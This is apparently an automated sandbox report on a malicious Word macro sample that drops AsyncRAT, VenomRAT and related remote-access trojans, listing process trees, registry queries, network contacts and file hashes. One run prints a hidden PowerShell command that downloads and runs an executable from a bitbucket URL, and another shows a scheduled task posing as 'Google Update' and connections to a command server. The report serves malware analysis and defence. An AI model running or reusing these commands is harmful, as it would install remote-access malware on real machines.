Malware Analysis Report

2024-11-15 08:41

Sample ID 241111-c3wp4atqcj
Target 7a3b1e9c8df660dc1c1cf9b17411c1d6a4ffca364712c5de8ac46b1199ece1ce
SHA256 7a3b1e9c8df660dc1c1cf9b17411c1d6a4ffca364712c5de8ac46b1199ece1ce
Tags
discovery execution macro asyncrat venomrat zgrat default rat redline @forxids infostealer doc @hukioside venom clients
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7a3b1e9c8df660dc1c1cf9b17411c1d6a4ffca364712c5de8ac46b1199ece1ce

Threat Level: Known bad

The file 7a3b1e9c8df660dc1c1cf9b17411c1d6a4ffca364712c5de8ac46b1199ece1ce was found to be: Known bad.

Malicious Activity Summary

discovery execution macro asyncrat venomrat zgrat default rat redline @forxids infostealer doc @hukioside venom clients

AsyncRat

Process spawned unexpected child process

RedLine payload

Asyncrat family

Venomrat family

ZGRat

Redline family

RedLine

Detect ZGRat V2

VenomRAT

Zgrat family

Async RAT payload

Command and Scripting Interpreter: PowerShell

Suspicious Office macro

Blocklisted process makes network request

Loads dropped DLL

Uses the VBS compiler for execution

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 02:38

Signatures

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

68s

Max time network

18s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\errr.dotm"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\errr.dotm"

Network

N/A

Files

memory/2648-0-0x000000002F9A1000-0x000000002F9A2000-memory.dmp

memory/2648-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2648-2-0x00000000715BD000-0x00000000715C8000-memory.dmp

memory/2648-8-0x0000000006770000-0x0000000006870000-memory.dmp

memory/2648-9-0x00000000715BD000-0x00000000715C8000-memory.dmp

memory/2648-10-0x0000000006770000-0x0000000006870000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

150s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fffffffnew.dotm" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fffffffnew.dotm" /o ""

C:\Users\Admin\AppData\Local\Temp\powershell.exe

C:\Users\Admin\AppData\Local\Temp\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/damnman/damn/downloads/PUMPED_docc.exe','2d21412.exe');Start-Process '2d21412.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp
GB 2.18.63.57:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 57.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 150.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

memory/3900-0-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-1-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

memory/3900-3-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-4-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-2-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-6-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-5-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-9-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-10-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-8-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-11-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

memory/3900-7-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-12-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-13-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-15-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-16-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

memory/3900-14-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-18-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-20-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-19-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-17-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-45-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/3900-52-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-53-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

memory/3900-54-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-55-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-61-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-62-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCD498.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240729-en

Max time kernel

131s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect ZGRat V2

Description Indicator Process Target
N/A N/A N/A N/A

VenomRAT

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Venomrat family

venomrat

ZGRat

rat zgrat

Zgrat family

zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2720 set thread context of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Google Update.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Google Update.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Google Update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2720 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe
PID 2720 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe
PID 2720 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe
PID 2720 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2720 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2844 wrote to memory of 3052 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3052 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3052 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3052 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 3052 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3052 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3052 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3052 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1496 wrote to memory of 1904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1496 wrote to memory of 1904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1496 wrote to memory of 1904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1496 wrote to memory of 1904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2708 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\System32\cmd.exe
PID 2708 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\System32\cmd.exe
PID 2708 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\System32\cmd.exe
PID 2272 wrote to memory of 2368 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2272 wrote to memory of 2368 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2272 wrote to memory of 2368 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2708 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\system32\cmd.exe
PID 2708 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\system32\cmd.exe
PID 2708 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\system32\cmd.exe
PID 640 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 640 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 640 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1496 wrote to memory of 284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 1496 wrote to memory of 284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 1496 wrote to memory of 284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 1496 wrote to memory of 284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 640 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 640 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 640 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe

"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe"

C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe

"C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7B57.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp819E.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\Google Update.exe

"C:\Users\Admin\AppData\Roaming\Google Update.exe"

C:\Users\Admin\AppData\Roaming\Google Update.exe

"C:\Users\Admin\AppData\Roaming\Google Update.exe"

Network

Country Destination Domain Proto
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp

Files

memory/2720-0-0x0000000073EDE000-0x0000000073EDF000-memory.dmp

memory/2720-1-0x0000000000A40000-0x0000000004EA4000-memory.dmp

memory/2720-2-0x0000000073ED0000-0x00000000745BE000-memory.dmp

memory/2720-3-0x0000000009680000-0x000000000978A000-memory.dmp

memory/2720-4-0x0000000000590000-0x00000000005B8000-memory.dmp

memory/2720-5-0x0000000008860000-0x00000000088F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe

MD5 1f304261de14934db9384720c638744a
SHA1 b98f60e6feea77a31363d5a686e7be40f6cfc049
SHA256 ab23ec09d1ea7a359bd834f2fef7aa5272e8f643e9c27cb2bfe8869a6e447e87
SHA512 01f29cf8553d72070c56b953c23771fef9e4aba31b733b001f7b8a1e49e2cf02d120b21baf76ccfa9040548ed603c0308c95a4fedce7b4749fc01baf3c4fc826

memory/2708-12-0x000007FEF5D33000-0x000007FEF5D34000-memory.dmp

memory/2708-13-0x0000000000290000-0x00000000002A8000-memory.dmp

memory/2844-16-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-22-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2844-24-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-20-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-18-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-14-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-28-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-26-0x0000000000400000-0x0000000000438000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

